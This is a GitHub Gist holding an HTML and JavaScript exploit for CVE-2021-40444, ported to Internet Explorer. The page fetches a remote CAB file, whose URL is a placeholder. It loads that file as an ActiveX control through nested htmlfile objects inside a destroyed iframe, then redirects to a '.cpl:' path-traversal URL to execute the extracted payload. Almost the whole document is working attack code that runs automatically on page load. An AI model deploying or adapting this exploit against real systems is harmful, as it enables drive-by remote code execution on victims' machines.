Created
January 7, 2022 09:16
-
-
Save D4stiny/4fd437bad4233856a7cebd42fb3057e5 to your computer and use it in GitHub Desktop.
CVE-2021-40444 payload ported for Internet Explorer
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <meta http-equiv="Expires" content="-1"> | |
| <meta http-equiv="X-UA-Compatible" content="IE=11"> | |
| </head> | |
| <body> | |
| <script> | |
| var exploit_cab = "[CAB file URL]"; | |
| function redirect() { | |
| // | |
| // Redirect current window without creating new one, | |
| // evading the IE pop up blocker. | |
| // | |
| window.location = ".cpl:../../../AppData/Local/Temp/Low/msword.inf"; | |
| } | |
| function exploit() { | |
| // | |
| // Create an iframe element. | |
| // | |
| var iframe_element = document.createElement("iframe"); | |
| try { | |
| document.body.appendChild(iframe_element); | |
| } catch (err) { | |
| document.documentElement.appendChild(iframe_element); | |
| } | |
| // | |
| // Retrieve the ActiveXObject for the new iframe element. | |
| // | |
| var iframe_activex = iframe_element.contentWindow.ActiveXObject; | |
| var base_activex = new iframe_activex("htmlfile"); | |
| // | |
| // Initialize and destroy the iframe. | |
| // | |
| iframe_element.contentDocument.open().close(); | |
| try { | |
| document.body.removeChild(iframe_element); | |
| } catch (err) { | |
| document.documentElement.removeChild(iframe_element); | |
| } | |
| // | |
| // Initialize the destroyed iframe's ActiveX element. | |
| // | |
| base_activex.open().close(); | |
| // | |
| // Create a nested ActiveX object inside the destroyed iframe. | |
| // destroyed iframe -> | |
| // base ActiveX -> | |
| // (this element) nested ActiveX #1 | |
| // | |
| var activex_nested_1 = new base_activex.Script.ActiveXObject("htmlFile"); | |
| activex_nested_1.open().close(); | |
| // | |
| // Create another nested ActiveX object inside the previous nested object. | |
| // destroyed iframe -> | |
| // base ActiveX -> | |
| // nested ActiveX #1 -> | |
| // (this element) nested ActiveX #2 | |
| // | |
| var activex_nested_2 = new activex_nested_1.Script.ActiveXObject("htmlFile"); | |
| activex_nested_2.open().close(); | |
| // | |
| // Create another nested ActiveX object inside the previous nested object. | |
| // destroyed iframe -> | |
| // base ActiveX -> | |
| // nested ActiveX #1 -> | |
| // nested ActiveX #2 -> | |
| // (this element) nested ActiveX #3 | |
| // | |
| var activex_nested_3 = new activex_nested_2.Script.ActiveXObject("htmlFile"); | |
| activex_nested_3.open().close(); | |
| var cab_request = new XMLHttpRequest(); | |
| cab_request.open("GET", exploit_cab); | |
| cab_request.send(); | |
| activex_nested_3.Script.document.write("<body>"); | |
| var activex_control = activex_nested_3.Script.document.createElement("object"); | |
| // | |
| // https://docs.microsoft.com/en-us/cpp/mfc/upgrading-an-existing-activex-control?view=msvc-160#using-the-codebase-tag-with-a-cab-file | |
| // | |
| activex_control.setAttribute("codebase", exploit_cab + "#version=5,0,0,0"); | |
| activex_control.setAttribute("classid", "CLSID:deadbeef-cafe-babe-aaaa-deadbeeeeeef"); | |
| // | |
| // Trigger the CAB file as an ActiveX control. | |
| // | |
| activex_nested_3.Script.document.body.appendChild(activex_control); | |
| // | |
| // Trigger in 500ms to give time for the .cab file to extract. | |
| // | |
| setTimeout(function() { | |
| redirect() | |
| }, 500); | |
| } | |
| exploit(); | |
| </script> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment